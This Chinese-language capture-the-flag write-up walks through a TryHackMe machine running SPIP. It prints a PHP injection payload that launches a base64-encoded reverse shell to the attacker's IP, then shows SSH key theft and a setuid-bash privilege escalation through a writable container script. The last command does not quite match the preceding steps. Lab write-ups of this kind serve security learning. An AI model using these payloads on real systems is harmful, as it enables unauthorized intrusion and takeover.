Publisher TryHackMe
文章描述了一次针对spip搭建的Web服务的安全渗透过程。攻击者通过gobuster工具扫描目录并利用已知漏洞成功反连设备。随后,在获取www-data权限后,攻击者通过查看日志、复制SSH密钥等手段进一步提升权限至think用户,并最终通过修改run_container.sh脚本实现更高权限的获取。 2025-11-5 15:23:6 Author: www.freebuf.com(查看原文) 阅读量:3 收藏

freeBuf

主站

分类

云安全 AI安全 开发安全 终端安全 数据安全 Web安全 基础安全 企业安全 关基安全 移动安全 系统安全 其他安全

特色

热点 工具 漏洞 人物志 活动 安全招聘 攻防演练 政策法规

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

端口扫描

1762337251_690b21e3be6975814ff56.png!small?1762337253132

使用

gobuster dir -u http://10.201.99.17/ -w directory-list-2.3-medium.txt

扫描得到目录:

1762337371_690b225be5dbe463fdc4e.png!small?1762337373347

访问发现这是一个使用spip搭建的web服务

1762337513_690b22e9386f6addad5e4.png!small?1762337514570

搜索spip漏洞,发现存在

oubli=s:19:"<?php phpinfo(); ?>";

执行下述payload

s:93:"<?Php system('echo c2ggLWkgPiYgL2Rldi90Y3AvMTAuNC44LjY4LzQ0NDQgMD4mMQ== |base64 -d|bash'); ?>"

成功反连上设备

登陆了www-data账号

发现可以查看日志

发现1762340075_690b2ceb36342e855fb92.png!small?1762340076454

提示没有密钥了,意思可以生成密钥

发现存在两个用户 root以及think

1762340244_690b2d94e2d113e04eb9a.png!small?1762340246105

1762340287_690b2dbfbbdee94985f5e.png!small?1762340288970

发先可以进入/home/think

1762340354_690b2e025796aa9365136.png!small?1762340355565

发现了第一个user.txt

然后我们发现可以查看用户的.ssh文件夹以及id_rsa

复制id_rsa到本地后,使用密钥访问到了think用户1762340815_690b2fcfe151110179583.png!small?1762340817137

登录访问上去

我们找到了一个特殊的文件

1762343520_690b3a60a567d2a0db9cf.png!small?1762343522000

使用strings该文件1762343547_690b3a7bad040a852b553.png!small?1762343549060

strings /usr/sbin/run_container

我们

1762343618_690b3ac20792c2b59cb3c.png!small?1762343619357

发现/usr/sbin/run_container使用了/bin/bash执行/opt/run_container.sh

1762343740_690b3b3c29145485f80f3.png!small?1762343741544

我们发现我们修改该文件

1762343828_690b3b94cc8170b2435b1.png!small?1762343830163

echo $SHELL
/usr/sbin/ash

我们发现我们在/ash执行相关命令

发现我们的shell从/usr/sbin/ash开始建立,无法写入该/opt/run_container.sh

发现我们无法修改该文件1762345065_690b40699c7db3aa9a919.png!small?1762345067117

我们可以临时修改我们的shell环境

echo -e '#!/usr/bin/perl\nexec "/bin/sh"' > /dev/shm/test.pl

chmod +x /dev/shm/test.pl

/dev/shm/test.pl

修改了我们的shell环境后,我们可以尝试再次修改/opt/run_container.sh

$ echo '#!/bin/bash\nchmod +s /bin/bash' > /opt/run_container.sh

然后执行

/usr/sbin/run_container

/dev/shm/my_sh

免责声明

1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。

2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。

3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。

已在FreeBuf发表 0 篇文章

本文为 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)


文章来源: https://www.freebuf.com/articles/web/455831.html
如有侵权请联系:admin#unsafe.sh